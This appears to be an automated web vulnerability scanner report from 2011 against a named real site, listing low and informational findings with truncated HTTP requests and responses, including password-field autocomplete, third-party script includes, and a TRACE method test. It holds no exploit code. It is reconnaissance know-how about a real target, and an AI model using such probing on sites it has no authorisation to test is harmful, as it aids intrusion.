'http://www.cloudsurfing onblur="if (this.value.length > 3) { $('#headingmessage2') else { $('#headingmessage2') </td> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password2" name="password2" value="" onkeyup="if (this.value.length > 3 && this.value != $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value == $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value.length < 4) { $('#key2').attr('src', 'http://www.cloudsurfing </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/ |
GET /user/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:13 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=a%3A0%3A%7B Set-Cookie: cloudsurfing=iY68Rl1 Set-Cookie: cloudsurfing=lBh6eGV Set-Cookie: cloudsurfing=BjPtBtM5kL Set-Cookie: cloudsurfing=1cWbKfP Set-Cookie: cloudsurfing=E3Dzls%2BT Vary: Accept-Encoding Content-Type: text/html Content-Length: 35214 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/favorites/ |
GET /user/favorites/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:50 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=e3Uablr Set-Cookie: cloudsurfing=GxF4Rcx Set-Cookie: cloudsurfing=RryZwtX Set-Cookie: cloudsurfing=wWhUy1f Vary: Accept-Encoding Content-Type: text/html Content-Length: 35430 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/writereview/ |
GET /user/writereview/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:14:48 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=MR4Md0A Set-Cookie: cloudsurfing=52VUVmi Set-Cookie: cloudsurfing=IpzbMOna3 Set-Cookie: cloudsurfing=Ly08FkE Vary: Accept-Encoding Content-Type: text/html Content-Length: 35800 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-Kosmix/buzz/ |
GET /site/1369-Kosmix/buzz/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cloudsurfing=y%2FwIA2wQI |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:13:03 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=3sRZAgY Set-Cookie: cloudsurfing=rGlDlb Set-Cookie: cloudsurfing=AIXLFQ7 Vary: Accept-Encoding Content-Type: text/html Content-Length: 70751 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Kosmix - the latest buzz - CloudSurfing </title> ...[SNIP]... </a> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-Kosmix/buzz |
GET /site/1369-Kosmix/buzz Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:23:18 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=q5dxWha Set-Cookie: cloudsurfing=QRcgpaL Set-Cookie: cloudsurfing=uWuR7V Set-Cookie: cloudsurfing=CSX4RaL Set-Cookie: cloudsurfing=4cUqNvB Vary: Accept-Encoding Content-Type: text/html Content-Length: 59411 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Kosmix - the latest buzz from google - CloudSurfing < ...[SNIP]... </a> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-Kosmix/buzz |
GET /site/1369-Kosmix/buzz Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:23:28 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=Oih%2FsW Set-Cookie: cloudsurfing=JLL7wa0 Set-Cookie: cloudsurfing=8beW18d Vary: Accept-Encoding Content-Type: text/html Content-Length: 61561 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Kosmix - the latest buzz from twitter - CloudSurfing ...[SNIP]... </a> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... </script> <script type="text/javascript" src="http://pagead2 </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | / |
GET / HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cloudsurfing=AoWFXSg |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:13:53 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=L0sgLaN Set-Cookie: cloudsurfing=QI Vary: Accept-Encoding Content-Type: text/html Content-Length: 128859 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> The one stop review source for web 2.0 apps, tools, service ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/captcha/ |
GET /auth/captcha/?2489653 HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:30 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=OFPXf2NnY Content-Length: 2034 Content-Type: image/jpeg ......JFIF............. ...C........... . ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
POST /auth/do_create HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 Content-Length: 60 unique_id=2&security_code |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:46 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=EiYiLPo Vary: Accept-Encoding Content-Type: text/html Content-Length: 7277 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/login |
GET /auth/login HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:22:00 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=uXE Vary: Accept-Encoding Content-Type: text/html Content-Length: 20351 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> The one stop review source for web 2.0 apps, tools, service ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /browse/ |
GET /browse/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:14:48 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=bBCoxtb Set-Cookie: cloudsurfing=ZO1i6re Vary: Accept-Encoding Content-Type: text/html Content-Length: 85151 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Browse: browse sites by category, tag, list, location, logo ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /community |
GET /community HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:23:02 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=1u99CwZ Vary: Accept-Encoding Content-Type: text/html Content-Length: 42203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Community: information on the greatest community in the clo ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /news |
GET /news HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:23:06 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=uLpwRuI Vary: Accept-Encoding Content-Type: text/html Content-Length: 63550 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> News - CloudSurfing </title> <meta http-equiv="C ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /recommendations |
GET /recommendations HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:22:01 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=d%2BhgX Vary: Accept-Encoding Content-Type: text/html Content-Length: 25046 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> CloudSurfing </title> <meta http-equiv="Content- ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-Kosmix/buzz/ |
GET /site/1369-Kosmix/buzz/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cloudsurfing=y%2FwIA2wQI |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:13:03 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=3sRZAgY Set-Cookie: cloudsurfing=rGlDlb Set-Cookie: cloudsurfing=AIXLFQ7 Vary: Accept-Encoding Content-Type: text/html Content-Length: 70751 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Kosmix - the latest buzz - CloudSurfing </title> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-Kosmix/buzz |
GET /site/1369-Kosmix/buzz Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:23:18 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=q5dxWha Set-Cookie: cloudsurfing=QRcgpaL Set-Cookie: cloudsurfing=uWuR7V Set-Cookie: cloudsurfing=CSX4RaL Set-Cookie: cloudsurfing=4cUqNvB Vary: Accept-Encoding Content-Type: text/html Content-Length: 59411 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Kosmix - the latest buzz from google - CloudSurfing < ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-Kosmix/buzz |
GET /site/1369-Kosmix/buzz Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:23:28 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=Oih%2FsW Set-Cookie: cloudsurfing=JLL7wa0 Set-Cookie: cloudsurfing=8beW18d Vary: Accept-Encoding Content-Type: text/html Content-Length: 61561 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Kosmix - the latest buzz from twitter - CloudSurfing ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-kosmix/buzz |
GET /site/1369-kosmix/buzz HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Wed, 18 May 2011 13:13:00 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=y%2FwIA2wQI Location: http://www.cloudsurfing Content-Length: 0 Content-Type: text/html |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/ |
GET /user/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:13 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=a%3A0%3A%7B Set-Cookie: cloudsurfing=iY68Rl1 Set-Cookie: cloudsurfing=lBh6eGV Set-Cookie: cloudsurfing=BjPtBtM5kL Set-Cookie: cloudsurfing=1cWbKfP Set-Cookie: cloudsurfing=E3Dzls%2BT Vary: Accept-Encoding Content-Type: text/html Content-Length: 35214 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/favorites/ |
GET /user/favorites/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:50 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=e3Uablr Set-Cookie: cloudsurfing=GxF4Rcx Set-Cookie: cloudsurfing=RryZwtX Set-Cookie: cloudsurfing=wWhUy1f Vary: Accept-Encoding Content-Type: text/html Content-Length: 35430 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/recommendations/ |
GET /user/recommendations/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 302 Found Date: Wed, 18 May 2011 13:21:57 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=DhjnHfs Location: http://www.cloudsurfing Vary: Accept-Encoding Content-Type: text/html Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/writereview/ |
GET /user/writereview/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:14:48 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=MR4Md0A Set-Cookie: cloudsurfing=52VUVmi Set-Cookie: cloudsurfing=IpzbMOna3 Set-Cookie: cloudsurfing=Ly08FkE Vary: Accept-Encoding Content-Type: text/html Content-Length: 35800 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | / |
TRACE / HTTP/1.0 Host: www.cloudsurfing.com Cookie: 16a8544a54638202 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:13:04 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: www.cloudsurfing.com Cookie: 16a8544a54638202 |
Severity: | Information |
